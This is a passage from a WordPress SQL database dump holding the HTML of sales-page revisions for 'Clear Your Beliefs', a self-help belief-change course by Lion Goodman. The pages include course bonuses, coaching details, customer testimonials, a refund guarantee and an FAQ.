<em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>”\n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior.\n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n&nbsp;\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Select Your Plan</a>\n<p style="text-align: center">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank">Free eBook</a>\n\n&nbsp;\n\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<strong>– G. J., software developer</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd">Purchase</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n//', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 20:33:02', '2014-12-12 01:33:02', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2004, 2, '2014-12-11 20:28:34', '2014-12-12 01:28:34', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free 